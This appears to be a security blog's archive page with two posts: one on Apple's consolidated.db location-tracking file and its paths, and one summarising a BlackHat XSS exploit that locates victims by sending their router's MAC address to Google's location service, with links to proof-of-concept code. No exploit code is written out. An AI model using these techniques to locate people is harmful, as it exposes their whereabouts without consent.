Archive

Posts Tagged ‘XSS’

iDevice tracking.

April 27th, 2011 Comments off
Reading Time: 3 minutes

I’m a little late wading into this but I thought it worth looking at based on my last post.

If you’ve been hiding under a rock; Apple tracks where you have been (regardless of your location tracking selection) in a file called consolidated.db.

Tracked!

This was originally discovered by Alex Levinson back in 2010 when he was researching the iPad.

Long story short there is s SQLite Database on both the iDevice (/private/var/root/Library/Caches/locationd/consolidated.db) and stored on your sync machine (/Users/<your user name>/Library/Application Support/MobileSync/Backup/). It uses cell tower triangulation, as opposed to GPS, to track your location (so accuracy isn’t always bang on, but pretty close in most cases).

Recently a couple of researchers from O’Reilly (Alasdair Allan and Pete Warden) wrote an OSX application that allows the visualisation of the stored data and bringing this out from the deep dark recesses of computer forensics to the mainstream, sparking outrage and cries of foul. This in turn forcing Apple to respond to these concerns.

You can see in the image “Tracked!” that it has tracked my movements throughout NSW and Canberra. So I decided to have a play myself to see what is all captured (instructions on how to find the consolidated.db file are on Pete Warden’s site). With the help of an SQLite viewer I opened up the file to see what all was there (see image below):

SQLite file opened

The second table is the interesting one that contains the location tracking data that everyone is interested in. A view into that table shows exactly what can be found in there:

CellLocation Table Contents

I’ve condensed the columns for Longitude and Latitude, mostly because I don’t want everyone knowing EXACTLY where I’ve been 😉

The interesting thing seems to be that there is also similar information being stored for WiFi locations though I’ll need some time playing about to understand how relevant the information stored is, but based on an initial pass it seems to capture any AP that my phone sees. I’ve tested this by pluging random MAC addresses into the Google to check against it’s wireless AP DB and sure enough, these are APs I’ve not connected to but are pretty close to some of the ones I do.

Given the high profile of this, now, and the ease in which the necessary scripts can be located online to grab this information. I suspect that it won’t be long before you see some exploits in the wild and high profile people start finding that their movements are published.

I hope Apple move to remedy this soon.

UPDATE: I forgot to add that Google also track phones and seem to track similar information on WiFi locations picked up by Android devices. I suspect that Apple is doing similar things with the information for their own reasons.

UPDATE2: Apple have released their latest IOS (4.3.3) that addresses some of the issues.

I’ve yet to run it up and review myself but it looks like they have made good. Now to see what happens with Google and Microsoft.

XSS and geolocation fun

August 10th, 2010 Comments off
Reading Time: 2 minutes

I’m slowly getting time to digest  the goodies that came out of the recent BlackHat 2010 event.

There were a number of really interesting topics covered by awesome people like Jeremiah Grossman, Robert (RSNAKE) Hansen and of course the Hoff!

One of these was Sammy K – of MySpace worm fame –  who did a presentation called “How I met your Girlfriend” demonstrating a XSS exploit to work out where someone actually is using Google’s Location services.

If you don’t know what XSS (Cross Site Scripting) is:

From Wikipedia: Cross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.

The exploit is fairly simple. It runs an AJAX script, using an XSS exploit, to obtain the router’s MAC address and then funnels it off to Google’s Location service and gets back a set of coordinates. Once you have these you can see exactly where said person is.

He has a pretty decent, overview that is available on his site here, with functioning proof of concept code available here.

Whilst the exploit was only “tested” on a Verizon FiOS router, other routers susceptible to XSS attacks, like D-Link, Linksys, Belkin and of course CISCO, could also be exploited with a modified version.

Now if only this could be used for good and not evil. The number of times that some of my bigger customers had moved whole sites and not told people is verging on silly.

Other Links & Sources:
Sammy’s site: http://sammy.pl
XSS Cheatsheet: http://ha.ckers.org/xss.html
Definition of XSS: http://en.wikipedia.org/wiki/Cross-site_scripting